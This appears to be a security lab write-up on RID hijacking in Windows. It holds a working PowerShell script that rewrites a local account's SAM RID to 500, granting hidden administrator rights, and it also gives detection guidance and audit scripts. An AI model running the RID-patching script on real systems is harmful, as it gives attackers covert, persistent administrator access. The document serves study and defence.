
# RID Hijacking

RID hijacking is a persistence technique in which an attacker who already holds SYSTEM-level privileges overwrites the RID (Relative Identifier, the last component of an account's SID) stored for a low-privileged local account with RID 500, the RID of the built-in Administrator account. On its next logon the low-privileged account receives a token carrying the Administrator's SID, and with it administrator privileges, without ever being added to a group. Because the RID is edited in the local SAM hive, the technique applies to local accounts only.

This technique was originally researched by [Sebastian Castro](https://twitter.com/r4wd3r): <https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html>

## Execution

This lab assumes that we have compromised the WS01 machine and have `NT AUTHORITY\SYSTEM` access to it. SYSTEM is required because the ACL on the `HKLM\SAM` hive denies access even to members of the local Administrators group.

The screenshot below shows that the user `hijacked` is a low-privileged local user with RID 1006 (0x3EE):

![](/files/-M0DGJlxfn7mv9ZjMEhU)

Trying to write a file to `c:\windows\` as the user `hijacked` fails with `Access is denied`, as expected:

![](/files/-M0DGYZgoeE3NSona3oi)

`HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003EE` (the subkey name is the account's RID, zero-padded to 8 hex digits) stores information about the user `hijacked` that LSASS reads during logon and authentication. Specifically, at offset `0x30` of the binary value `F` sits a 32-bit little-endian DWORD holding the account's RID, which in our case is 0x3EE (1006) and therefore shows up in the hex dump as `EE 03 00 00`:

![](/files/-M0DGeYuTBtkjJYilbhi)

We change that DWORD to 0x1F4 (500, the RID of the built-in Administrator account), so the bytes become `F4 01 00 00`. Only the low two bytes differ, which is why the screenshot shows a two-byte edit. From the next logon on, LSASS treats `hijacked` as RID 500:

![](/files/-M0DGtzKXc-5kF_h7ypJ)
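The same change carried out from a SYSTEM-level PowerShell session, as an added example that is not part of the original page or of the original research. It assumes the lab account name `hijacked` and the target RID 500, resolves the account's current RID from its SID, and patches the DWORD at offset 0x30 of the `F` value; the function and variable names are this example's own.

```powershell
# Added example: patch the RID stored in a local account's SAM "F" value.
# Must run as NT AUTHORITY\SYSTEM (e.g. psexec.exe -s -i powershell.exe);
# the HKLM\SAM hive ACL denies access even to local Administrators.
# The account name 'hijacked' and the target RID 500 are lab assumptions.

$UsersKey  = 'SAM\SAM\Domains\Account\Users'
$RidOffset = 0x30   # offset of the RID DWORD inside the binary "F" value

# Resolve a local account name to its RID (the last SID component).
function Get-AccountRid {
    param([Parameter(Mandatory)][string]$Name)
    $sid = (New-Object System.Security.Principal.NTAccount($Name)).Translate(
        [System.Security.Principal.SecurityIdentifier])
    return [uint32]($sid.Value -split '-')[-1]
}

# Open Users\<8-hex-digit RID> and return the key together with its F bytes.
function Get-SamUserF {
    param([Parameter(Mandatory)][uint32]$Rid, [switch]$Writable)
    $path = '{0}\{1:X8}' -f $UsersKey, $Rid
    $key  = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($path, [bool]$Writable)
    if (-not $key) { throw "Cannot open HKLM\$path (are you SYSTEM?)" }
    $f = [byte[]]$key.GetValue('F')
    if ($f.Length -lt $RidOffset + 4) { throw "F value too short ($($f.Length) bytes)" }
    return [pscustomobject]@{ Key = $key; F = $f }
}

# Read the RID that LSASS will use for this account (little-endian DWORD at 0x30).
function Get-SamStoredRid {
    param([Parameter(Mandatory)][uint32]$Rid)
    $entry = Get-SamUserF -Rid $Rid
    try { return [BitConverter]::ToUInt32($entry.F, $RidOffset) }
    finally { $entry.Key.Close() }
}

# Overwrite that DWORD. For RIDs below 0x10000 only the low two bytes change,
# which matches the two-byte edit in the screenshots; writing all four is safer.
function Set-SamStoredRid {
    param([Parameter(Mandatory)][uint32]$Rid, [Parameter(Mandatory)][uint32]$NewRid)
    $entry = Get-SamUserF -Rid $Rid -Writable
    try {
        [Array]::Copy([BitConverter]::GetBytes($NewRid), 0, $entry.F, $RidOffset, 4)
        $entry.Key.SetValue('F', $entry.F, [Microsoft.Win32.RegistryValueKind]::Binary)
    } finally { $entry.Key.Close() }
}

# --- lab usage: hijacked (RID 1006 / 0x3EE) -> Administrator RID 500 / 0x1F4 ---
$targetRid = Get-AccountRid -Name 'hijacked'          # 1006 in this lab
'Before: subkey {0:X8} stores RID 0x{1:X} ({1})' -f $targetRid, (Get-SamStoredRid -Rid $targetRid)
Set-SamStoredRid -Rid $targetRid -NewRid 500
'After:  subkey {0:X8} stores RID 0x{1:X} ({1})' -f $targetRid, (Get-SamStoredRid -Rid $targetRid)
# Takes effect on the next logon of 'hijacked'; tokens of existing sessions are not rebuilt.
```

Running the script a second time with `-NewRid` set to the value printed in the `Before:` line restores the original RID, which is the cleanup step to perform when the lab is finished.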

## Demo

After changing the RID of `hijacked` from 0x3EE to 0x1F4 and creating a new logon session (the change only takes effect on a fresh logon; tokens of existing sessions are not rebuilt), the user `hijacked` can write to `c:\windows\`, showing that it now has administrative privileges:

![](/files/-M0DHZBbuYfbn1bcmp53)

Note that the user `hijacked` is still not a member of the local Administrators group; what changed is that its logon token now carries the SID ending in RID 500. Checks based on group membership alone will therefore not reveal the hijack:

![](/files/-M0DHoH1TRurXKs55jPX)

## Detection

Monitor `HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\*\F` for modifications (for example with a registry SACL and Security event 4657, or Sysmon event 13), especially when the writing process is something other than LSASS, such as `reg.exe` or PowerShell running as SYSTEM. Two retroactive checks follow directly from how the technique works: a `Users\<hex RID>` subkey whose `F` value at offset `0x30` does not match its own name (e.g. `000003EE` holding 0x1F4), and logon events (4624) in which the Security ID ends in `-500` but the account name is not that of the RID-500 account.
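Both retroactive checks as an added PowerShell example; this is not code from the original page or from the original research. The SAM audit needs a SYSTEM session, the event-log check needs local administrator rights, and the second check relies on the logon token SID being what event 4624 records, which is what the demo above shows. Function names and the `$MaxEvents` default are this example's own choices.

```powershell
# Added example: two retroactive checks for RID hijacking.
# 1) Audit the SAM: every Users\<8-hex RID> subkey must store its own RID at
#    offset 0x30 of "F". Needs a SYSTEM session to read HKLM\SAM.
# 2) Scan Security 4624 events for a logon whose SID ends in -500 but whose
#    account name is not the RID-500 account's. Needs local admin.
# Function names and the $MaxEvents default are assumptions of this example.

$UsersKey  = 'SAM\SAM\Domains\Account\Users'
$RidOffset = 0x30

function Find-SamRidMismatch {
    $root = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($UsersKey)
    if (-not $root) { throw "Cannot open HKLM\$UsersKey (are you SYSTEM?)" }
    try {
        foreach ($name in $root.GetSubKeyNames()) {
            if ($name -notmatch '^[0-9A-F]{8}$') { continue }   # skips the "Names" subkey
            $key = $root.OpenSubKey($name)
            try {
                $f = [byte[]]$key.GetValue('F')
                if (-not $f -or $f.Length -lt $RidOffset + 4) { continue }
                $stored   = [BitConverter]::ToUInt32($f, $RidOffset)
                $expected = [Convert]::ToUInt32($name, 16)
                if ($stored -ne $expected) {
                    [pscustomobject]@{
                        SubKey      = $name
                        ExpectedRid = $expected
                        StoredRid   = $stored
                        Finding     = 'RID in F value does not match subkey name'
                    }
                }
            } finally { $key.Close() }
        }
    } finally { $root.Close() }
}

function Find-Rid500LogonByOtherName {
    param([int]$MaxEvents = 5000)
    # Name that a SID ending in -500 should resolve to on this machine.
    $machineSid = (Get-LocalUser | Select-Object -First 1).SID.AccountDomainSid
    $adminName  = (New-Object System.Security.Principal.SecurityIdentifier(
        "$($machineSid.Value)-500")).Translate(
        [System.Security.Principal.NTAccount]).Value.Split('\')[-1]

    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $x = [xml]$_.ToXml()
            $d = @{}
            foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
            if ($d.TargetUserSid -like 'S-1-5-21-*-500' -and $d.TargetUserName -ne $adminName) {
                [pscustomobject]@{
                    Time      = $_.TimeCreated
                    UserName  = $d.TargetUserName
                    Sid       = $d.TargetUserSid
                    LogonType = $d.LogonType
                    Finding   = "RID-500 token issued to an account other than '$adminName'"
                }
            }
        }
}

Find-SamRidMismatch | Format-Table -AutoSize
Find-Rid500LogonByOtherName | Format-Table -AutoSize
```

In the lab above the first check reports subkey `000003EE` with `ExpectedRid 1006` and `StoredRid 500`, and the second check lists every logon of `hijacked` made after the edit, because those sessions were issued a token with the RID-500 SID.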

## References

{% embed url="https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html" %}


